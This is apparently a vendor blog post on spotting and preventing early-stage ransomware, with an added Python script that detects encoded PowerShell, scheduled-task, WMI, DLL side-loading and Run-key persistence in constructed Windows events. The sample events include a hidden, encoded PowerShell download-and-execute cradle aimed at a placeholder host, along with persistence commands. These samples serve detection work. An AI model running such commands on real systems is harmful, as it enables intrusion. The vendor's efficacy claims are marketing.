Understanding and Preventing Early Stages of Ransomware Attacks

Ransomware has steadily evolved into arguably the most critical and immediate cybersecurity threat facing both the public and private sectors, with a new organization suffering a ransomware attack every 14 seconds (Astra). Prominent Ransomware-as-a-Service (RaaS) variants such as RansomHub are increasingly used by cybercriminals and nation-state threat actors to exfiltrate and then encrypt sensitive data as leverage for ransom payment. These attacks employ advanced tactics, techniques, and procedures (TTPs) such as double extortion, self-propagating malware, and AI-driven social engineering to evade detection and increase attack efficacy. To protect mission-critical data effectively, it is critical to understand and prevent ransomware at its earliest stages. Implementing advanced and integrated cybersecurity solutions for identity security, cryptographic and vulnerability management, and data resiliency and recovery enables federal agencies to significantly reduce their exposure to ransomware and mitigate risk before it is too late.

Stage 1: Reconnaissance (Pre-Attack Phase)

During reconnaissance, attackers gather information about the target to identify exploitable weaknesses before any intrusion takes place. Techniques include Open-Source Intelligence (OSINT), phishing email lures used to profile users and confirm live mailboxes, vulnerability scanning of Internet-facing assets, and external DNS and WHOIS enumeration.

  • Qualys continuously maps and monitors your external attack surface, pinpointing and prioritizing vulnerabilities that appear in CISA's Known Exploited Vulnerabilities (KEV) catalog or are known ransomware attack vectors. Automated and comprehensive scanning not only uncovers exposures but can deploy compensating security controls for critical, newly discovered weaknesses before an official vendor patch is available. Qualys also maintains a real-time inventory of which vulnerabilities are patched and which are not, giving accurate visibility and helping your agency stay ahead of ransomware attacks.
  • InfoSec Global Federal automates cryptographic posture management by scanning all cryptographic objects across the agency to detect weak, foreign, or malicious algorithms that may serve as attack vectors for ransomware.

Stage 2: Initial Access (Day 0 – Compromise)

Attackers typically achieve initial access to the target network through phishing emails with malicious attachments or links, exploitation of public-facing applications (known CVEs), credential stuffing with leaked username/password pairs, exploitation of unpatched software (for example, the EternalBlue SMBv1 exploit for MS17-010), and supply chain compromises.

  • Qualys VMDR detects vulnerabilities in the CISA Known Exploited Vulnerabilities (KEV) catalog and other exploitable CVEs, and can automate the deployment of patches to remediate them.
  • CyberArk prevents ransomware execution by provisioning and securing access credentials against credential stuffing, using identity security solutions such as EPM (Endpoint Privilege Management) and PAM (Privileged Access Management) to safeguard mission-critical assets from unauthorized access.
    • EPM controls privileges and restricts unknown executables, reducing the chance that a zero-day ransomware payload can run.
    • EPM has been tested by Merlin Labs against 3+ million ransomware strains with 100% prevention efficacy.

Stage 3: Execution (Day 1 – Establishing Presence)

Upon gaining initial access, attackers launch malicious payloads using techniques such as PowerShell execution (often with encoded commands), scheduled tasks/jobs, Windows Management Instrumentation (WMI) abuse, and dynamic-link library (DLL) side-loading.

  • CyberArk EPM blocks PowerShell-based attacks, execution of malicious scripts, and the bypass techniques used to steal access credentials.
  • Qualys enhances detection capabilities by identifying anomalous behaviors indicative of malicious payload execution, ensuring prompt response to threats and effective risk mitigation.

Stage 4: Persistence (Day 2 – Maintaining Access)

Threat actors ensure continued access through methods like creating registry run keys, establishing new services, scheduling malicious tasks, and installing backdoors.

  • CyberArk proactively mitigates persistent access by layering PAM with EPM's active detection and automated response. CyberArk not only restricts unauthorized execution of tasks and blocks backdoor installation but also deploys decoy "lure" credentials, monitors their use across your environment, and enforces just-in-time local admin privileges to limit standing access.
  • Qualys EDR runs on the same agent used for vulnerability scanning, detecting unauthorized registry run keys, new services, scheduled tasks, or backdoor implants, and automatically triggers containment and remediation.
  • InfoSec Global Federal continuously monitors all cryptographic keys, ensuring that any malicious keys created by threat actors are identified and remediated as they emerge.
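As an added illustration of the execution (Stage 3) and persistence (Stage 4) tradecraft described above, the following Python script is not code from the original post or from any of the vendors named here. It runs simple detection logic over a handful of constructed Windows event records: it decodes PowerShell -EncodedCommand payloads (base64 over UTF-16LE, which a plain string match on the command line would miss), flags schtasks /create and WMI process creation, flags rundll32 loading a DLL from a user-writable directory as a side-loading heuristic, and flags Run-key writes and services installed from user-writable paths. The event field names, the sample records, and the list of autostart locations are assumptions made for the example; real telemetry (Sysmon, the Windows Security log) would need a small mapping layer in front of analyze_event.

```python
"""Detect early-stage ransomware execution and persistence tradecraft in
constructed Windows event records (added example; not vendor code)."""
import base64
import re

# Autostart registry keys commonly abused for persistence. Assumption: a
# representative subset, not an exhaustive list of autostart locations.
RUN_KEY_RE = re.compile(
    r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\")
# Directories an unprivileged user can write to; binaries launched from here
# as services or via rundll32 deserve a second look.
USER_WRITABLE_RE = re.compile(r"(?i)^C:\\(Users|ProgramData|Windows\\Temp)\\")
# PowerShell accepts abbreviated forms of -EncodedCommand.
ENCODED_FLAG_RE = re.compile(
    r"(?i)\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Captures the DLL path that rundll32 was asked to load (up to the ",Export").
RUNDLL_TARGET_RE = re.compile(r'(?i)rundll32(?:\.exe)?"?\s+"?([^",]+)')


def decode_powershell(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return a list of (technique, detail) findings for one event record."""
    findings = []
    kind = ev.get("event")
    if kind == "process_create":
        cmd = ev.get("cmdline", "")
        image = ev.get("image", "").lower()
        decoded = decode_powershell(cmd)
        if decoded is not None:
            findings.append(("encoded_powershell", decoded))
        if image.endswith("schtasks.exe") and re.search(r"(?i)/create\b", cmd):
            findings.append(("scheduled_task_create", cmd))
        if image.endswith("wmic.exe") and re.search(r"(?i)process\s+call\s+create", cmd):
            findings.append(("wmi_process_create", cmd))
        if image.endswith("rundll32.exe"):
            m = RUNDLL_TARGET_RE.search(cmd)
            if m and USER_WRITABLE_RE.match(m.group(1)):
                findings.append(("dll_sideload_suspect", m.group(1)))
    elif kind == "registry_set":
        if RUN_KEY_RE.search(ev.get("key", "")):
            findings.append(("run_key_persistence", f"{ev['key']} = {ev.get('value')}"))
    elif kind == "service_installed":
        path = ev.get("image_path", "").strip('"')
        if USER_WRITABLE_RE.match(path):
            findings.append(("service_persistence", f"{ev.get('name')} -> {path}"))
    return findings


def scan(events):
    """Run analyze_event over a sequence of records; return (index, technique, detail)."""
    return [(i, t, d) for i, ev in enumerate(events) for t, d in analyze_event(ev)]


# Constructed sample telemetry. The stager below is built at runtime so the
# base64 is guaranteed to be a valid -EncodedCommand argument; the domain is
# the reserved example.invalid, not real infrastructure.
SAMPLE_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"},
    {"event": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "C:\Users\Public\svc.exe" /RL HIGHEST'},
    {"event": "process_create", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": r'wmic.exe process call create "cmd /c C:\Users\Public\svc.exe"'},
    {"event": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\update.dll,Start"},
    {"event": "registry_set",
     "key": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\Public\svc.exe"},
    {"event": "service_installed", "name": "WinUpdateSvc",
     "image_path": r'"C:\ProgramData\wu\wu.exe"'},
    # Two benign records that should produce no findings.
    {"event": "process_create", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"event": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "value": "1"},
]

if __name__ == "__main__":
    for idx, technique, detail in scan(SAMPLE_EVENTS):
        print(f"event[{idx}] {technique}: {detail}")
```

The point of the script is the decoding step and the "launched from a user-writable path" filter rather than the string matches themselves: an EDR that only alerts on the literal text powershell.exe never sees the download cradle inside the encoded argument, and a Run-key or service pointing into C:\Users or C:\ProgramData is far more often attacker persistence than a legitimate installer.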

The preliminary stages of ransomware attacks present critical opportunities to detect and disrupt threats before cyber adversaries compromise mission-critical data. With ransomware impacting 59% of organizations in 2024 (Sophos), early-stage prevention is imperative to protect your agency's mission. Integrating solutions from CyberArk, Qualys, and InfoSec Global provides both preventive and detective controls to detect and stop ransomware attacks at their inception, significantly enhancing your agency's cybersecurity resilience.

Note: This blog post is part of our ongoing series on ransomware attacks. Check out the next blog in the series: "Mid-Stage Ransomware Protection: Strengthening Security Against Privilege Escalation and Defense Evasion."

How PAM Can Protect Feds From Third Party/Service Account Cyber Attacks